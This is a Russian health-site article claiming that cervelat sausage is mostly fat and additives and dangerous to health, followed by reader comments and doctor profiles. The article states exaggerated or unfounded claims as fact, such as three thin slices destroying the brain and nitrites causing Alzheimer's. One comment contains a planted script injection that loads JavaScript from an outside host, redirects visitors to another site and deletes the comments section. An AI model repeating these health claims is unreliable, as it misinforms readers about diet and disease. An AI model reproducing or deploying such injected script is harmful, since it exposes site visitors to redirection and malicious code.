Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Продукт-обманщик. Сервела...  >>  Продукт-обманщик. Сервелат
 
Обратная связь
 

Продукт-обманщик. Сервелат

Размер шрифта
23 января 2012 09:00
  • google_analytics: false
  • Нравится

Считаете, что сервелат – это отборное мясо? Вы сильно ошибаетесь! Мяса в этом продукте меньше всего. А вот опасностей для здоровья – гораздо больше, и в их числе старческое слабоумие и инфаркт.

1

Считается, что сервелат придумали в Швейцарии, еще в 16 веке. Раньше мясники добавляли в фарш свиные мозги, поэтому продукт стали называть cerebellum («мозг»). Сервелат готовят из свинины, небольшой части говядины, перемешивают со специями, затем набивают в кишку и коптят. По советскому ГОСТу в сервелате должно быть 50% жирной свинины, 25% свинины и 25% говядины, соль, перец. Сейчас же эти стандарты практически не соблюдаются, так что по закону нет необходимости вообще класть мясо в колбасу.  

3 компонента в сервелате, опасные для здоровья

1

  1. В сервелате более 75% жира. Животный жир в отличие от растительного опасен для здоровья, так как формирует липопротеиды низкой плотности, главных виновников атеросклеротических бляшек и тромбов.

  2. Много разных химических соединений, так называемых нитратов или нитритов, обеспечивающих окраску продукта. Нитрит натрия обозначается в пищевой промышленности кодом E250 и, помимо фиксации цвета, используется для подавления развития бактерий ботулизма.

Нитрит натрия, попадая в организм, соединяется с белками крови и формирует так называемые нитрозамины. Эти канцерогены вызывают рак кишечника и разрушают миелиновую оболочку сосудов головного мозга, рушат гематоэнцефалический, защитный, барьер мозга, и приводят к болезни Альцгеймера. 

Любое переработанное мясо: карбонат, вареная колбаса, сосиски, копченая колбаса – ведут к необратимым последствиям в организме.

  1. В 100 г сервелата двойная суточная норма соли, почти 2 чайные ложки. Избыток соли ведет к задержке жидкости в организме, лишнему весу, отекам и повышенному давлению.

1


В сервелате практически нет мяса, потому что современные производители добавляют туда в качестве наполнителей соевый или пшеничный белок или даже костную муку. Доза колбасы, которая способна разрушить мозг, невелика: всего три тонких ломтика.

Что делать? 

  • Для здорового питания сервелат не подходит из-за высокой жирности и опасной добавки нитрита натрия. 
  • Сервелат следует потреблять очень редко и только по праздничным датам.
  • Лучше вообще отказаться от сервелата в пользу других, более полезных для здоровья деликатесов.

Сюжеты по теме:
Сервелат. Продукты-обманщики

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

25 апреля 2015 в 08:55

Цитировать   |   Пожаловаться

Читайте книжки, не позорьтесь - пшеничный, и вообще любой растительный белок в отличии от мяса - полезен!!! А химия, химии рознь, если добавлено что, то - не факт, что оно менее полезно, нежели природное... Почти все лекарства - химия, и ничего страшного!!!

2 - Гость

25 апреля 2015 в 08:58

Цитировать   |   Пожаловаться


3 - zzzzzz

01 июля 2015 в 00:00

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.